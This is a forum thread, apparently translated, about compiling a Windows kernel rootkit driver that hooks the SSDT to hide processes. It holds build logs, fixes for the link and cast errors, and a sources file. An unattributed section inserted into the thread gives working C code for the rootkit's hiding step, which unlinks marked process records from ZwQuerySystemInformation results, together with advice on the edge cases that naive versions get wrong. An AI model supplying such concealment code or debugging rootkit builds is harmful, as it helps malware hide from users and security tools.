Views: 3961  Replies: 3
Rootkit hooking the SSDT to hide processes
I downloaded the source code from the web, but it does not compile. Build output:

BUILD: Adding /Y to COPYCMD so xcopy ops won't hang.
BUILD: Using 2 child processes
BUILD: Object root set to: ==> objchk_wxp_x86
BUILD: Compile and Link for i386
BUILD: Loading C:\WINDDK\3790~1.183\build.dat...
BUILD: Computing Include file dependencies:
BUILD: Examining c:\documents and settings\hp\桌面\rootkit\rootkits——windows内核的安全防护\hideprocesshookmdl directory for files to compile.
    c:\documents and settings\hp\桌面\rootkit\rootkits——windows内核的安全防护\hideprocesshookmdl - 1 source files (239 lines)
BUILD: Compiling (NoSync) c:\documents and settings\hp\桌面\rootkit\rootkits——windows内核的安全防护\hideprocesshookmdl directory
1>errors in directory c:\documents and settings\hp\桌面\rootkit\rootkits——windows内核的安全防护\hideprocesshookmdl
1>NMAKE : warning U4006: special macro undefined : '$<'
1>Compiling - objchk_wxp_x86\i386 for all platforms
1>NMAKE : warning U4006: special macro undefined : '$<'
1>Compiling - objchk_wxp_x86\i386 for all platforms
1>NMAKE : warning U4006: special macro undefined : '$<'
1>Compiling - objchk_wxp_x86\i386 for all platforms
BUILD: Compiling c:\documents and settings\hp\桌面\rootkit\rootkits——windows内核的安全防护\hideprocesshookmdl directory
101>NMAKE : warning U4006: special macro undefined : '$<'
101>Compiling - objchk_wxp_x86\i386 for all platforms
101>NMAKE : warning U4006: special macro undefined : '$<'
101>Compiling - objchk_wxp_x86\i386 for all platforms
101>NMAKE : warning U4006: special macro undefined : '$<'
101>Compiling - objchk_wxp_x86\i386 for all platforms
BUILD: Compile errors: not linking c:\documents and settings\hp\桌面\rootkit\rootkits——windows内核的安全防护\hideprocesshookmdl directory
BUILD: Done
    6 files compiled - 6 Errors - 0 LPS

Then I used DriverStudio to create an ntdriver (C code) and added the source code from the CD, but there were still problems. Building with WDK 6000 gave some syntax errors. I fixed the other syntax errors, but for `MappedSystemCallTable = MmMapLockedPages(g_pmdlSystemCall, KernelMode);` it reports an error that it cannot convert from PVOID to PVOID*, which is frustrating. I changed MappedSystemCallTable to type PVOID, but then I got the following link errors:

errors in directory e:\driver\hidepr~1\driver
e:\driver\hidepr~1\driver\hideprocesshookmdl.obj : error LNK2001: unresolved external symbol "__declspec(dllimport) struct ServiceDescriptorEntry KeServiceDescriptorTable" (__imp_?KeServiceDescriptorTable@@3UServiceDescriptorEntry@@A)
e:\driver\hidepr~1\driver\hideprocesshookmdl.obj : error LNK2019: unresolved external symbol "__declspec(dllimport) long __stdcall ZwQuerySystemInformation(unsigned long,void *,unsigned long,unsigned long *)" (__imp_?ZwQuerySystemInformation@@YGJKPAXKPAK@Z) referenced in function _DriverEntry@8
e:\driver\hidepr~1\driver\objchk_wxp_x86\i386\hideprocesshookmdl.sys : error LNK1120: 2 unresolved externals

I can't get past this hurdle; could an expert give me some pointers, or send me a copy of code that builds? Many thanks.
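The two symbols in the link errors above are the whole mechanism of this driver: `KeServiceDescriptorTable` is the SSDT that gets patched, and `ZwQuerySystemInformation` is the service whose result buffer the hook rewrites so that chosen processes disappear from the process list. One practical note on the messages themselves: the decorated names in them (`?ZwQuerySystemInformation@@YGJKPAXKPAK@Z`, `?KeServiceDescriptorTable@@3U...`) are C++ decorations, which is what you get when the file is compiled as C++ without `extern "C"` around those declarations; a `TARGETTYPE=DRIVER` build already links ntoskrnl.lib, so the missing piece is linkage, not a library. The same C++ compilation is why `MmMapLockedPages` needs an explicit `(PVOID *)` cast there, since C++ does not convert `PVOID` to `PVOID *` implicitly.

The example below is an added, user-mode C simulation of the hiding step itself, not code from the book, the CD, or any poster in this thread. It builds a constructed list of records in the shape ZwQuerySystemInformation returns (each record carries `NextEntryOffset`, the byte distance to the next record, zero for the last), unlinks every record whose image name starts with an assumed `_root_` marker, and walks the chain afterwards to show what a caller such as Task Manager would still see. The record layout is a cut-down stand-in for SYSTEM_PROCESS_INFORMATION; only `NextEntryOffset` matters to the logic, so it handles the real variable-length records the same way, including the awkward cases of a hidden record at the head or at the tail of the list.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Cut-down, constructed stand-in for the SYSTEM_PROCESS_INFORMATION records
 * that ZwQuerySystemInformation(SystemProcessInformation, ...) fills in. The
 * real record is far larger and variable-length (the image name is a
 * UNICODE_STRING and thread entries follow it); the unlinking logic below
 * only relies on NextEntryOffset: byte distance to the next record, 0 at the
 * end of the list. */
typedef struct {
    uint32_t NextEntryOffset;
    uint32_t ProcessId;
    char     ImageName[24];
} PROC_INFO;

/* Assumed marker: records whose image name starts with this are hidden. */
#define HIDE_PREFIX "_root_"

/* Post-process a filled buffer the way an SSDT hook on
 * ZwQuerySystemInformation would before returning it to the caller.
 * Returns the number of records unlinked. */
static size_t hide_processes(uint8_t *buf, size_t len)
{
    uint8_t *end = buf + len;
    PROC_INFO *prev = NULL;
    PROC_INFO *cur = (PROC_INFO *)buf;
    size_t removed = 0;

    while (cur != NULL) {
        PROC_INFO *next = cur->NextEntryOffset
            ? (PROC_INFO *)((uint8_t *)cur + cur->NextEntryOffset) : NULL;

        if (strncmp(cur->ImageName, HIDE_PREFIX, sizeof HIDE_PREFIX - 1) != 0) {
            prev = cur;              /* visible record: it becomes the predecessor */
            cur = next;
            continue;
        }

        if (prev != NULL) {
            /* Point the predecessor past the hidden record, or terminate the
             * list if the hidden record was the last one. The bytes stay in
             * the buffer, but no walker following the chain reaches them. */
            prev->NextEntryOffset = next ? prev->NextEntryOffset + cur->NextEntryOffset : 0;
            removed++;
            cur = next;
        } else if (next != NULL) {
            /* Hidden record is the head: there is no predecessor to edit, so
             * slide the rest of the buffer down over it. Offsets are relative
             * to their own record, so the chain stays valid after the move. */
            size_t gap = (size_t)((uint8_t *)next - (uint8_t *)cur);
            memmove(cur, next, (size_t)(end - (uint8_t *)next));
            end -= gap;
            removed++;
            /* cur is not advanced: re-examine whatever now sits at the head */
        } else {
            /* A lone hidden record cannot be unlinked in this format; a real
             * hook would have to return an empty result instead. Leave it. */
            cur = NULL;
        }
    }
    return removed;
}

/* Builds the constructed sample list (five records with alternating sizes so
 * the offsets are not uniform), hides the marked ones, and writes the names
 * still reachable through the chain into `names`, comma separated.
 * Returns the number of hidden records. */
size_t run_demo(char *names, size_t names_cap)
{
    static const char *sample[] = {
        "_root_a.exe", "explorer.exe", "_root_b.exe", "cmd.exe", "_root_c.exe"
    };
    enum { N = sizeof sample / sizeof sample[0] };
    union { PROC_INFO align; uint8_t bytes[N * (sizeof(PROC_INFO) + 8)]; } storage;
    uint8_t *buf = storage.bytes;
    size_t off = 0;

    for (size_t i = 0; i < N; i++) {
        PROC_INFO *r = (PROC_INFO *)(buf + off);
        size_t stride = sizeof(PROC_INFO) + (i % 2) * 8;   /* mimic variable-length records */
        r->NextEntryOffset = (i + 1 < N) ? (uint32_t)stride : 0;
        r->ProcessId = (uint32_t)(100 + 4 * i);
        memset(r->ImageName, 0, sizeof r->ImageName);
        strncpy(r->ImageName, sample[i], sizeof r->ImageName - 1);
        off += stride;
    }

    size_t removed = hide_processes(buf, off);

    size_t pos = 0;
    names[0] = '\0';
    for (PROC_INFO *p = (PROC_INFO *)buf;; p = (PROC_INFO *)((uint8_t *)p + p->NextEntryOffset)) {
        int n = snprintf(names + pos, names_cap - pos, "%s%s", pos ? "," : "", p->ImageName);
        if (n < 0 || (size_t)n >= names_cap - pos) break;
        pos += (size_t)n;
        if (p->NextEntryOffset == 0) break;
    }
    return removed;
}

int main(void)
{
    char names[128];
    size_t hidden = run_demo(names, sizeof names);
    printf("hidden %zu record(s); visible: %s\n", hidden, names);
    return 0;
}
```

The "head of the list" branch is the one most hobby implementations get wrong: advancing a local pointer past the first record changes nothing in the buffer the caller receives, so the record stays visible; moving the tail down (and shrinking the returned length accordingly in a real hook) is what actually removes it.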
Reply #1
Posted: 2009-08-10 16:57
The source code from the CD fails to build because the driver's directory path contains spaces. I moved hideProcessHookMDL to the root of the C: drive and it built with DDK 2003.
I don't know why that is, but it compiles now. As for the link errors in the project I created myself afterwards, those are still unsolved; any pointers appreciated.
Reply #2
Posted: 2009-08-11 09:00
It may be related to your build environment. I couldn't build it in the Windows 2000 Free Build Environment either, but after changing the sources file it compiled. The sources file I used is below:

TARGETNAME=HideProcessHookMDL
TARGETPATH=obj
TARGETTYPE=DRIVER

SOURCES=HideProcessHookMDL.rc \
        HideProcessHookMDL.c \
        registry.c \
        debug.c \
        queue.c
Reply #3
Posted: 2010-03-02 16:56
This is a copy I downloaded from the web; it builds without problems. Give it a try.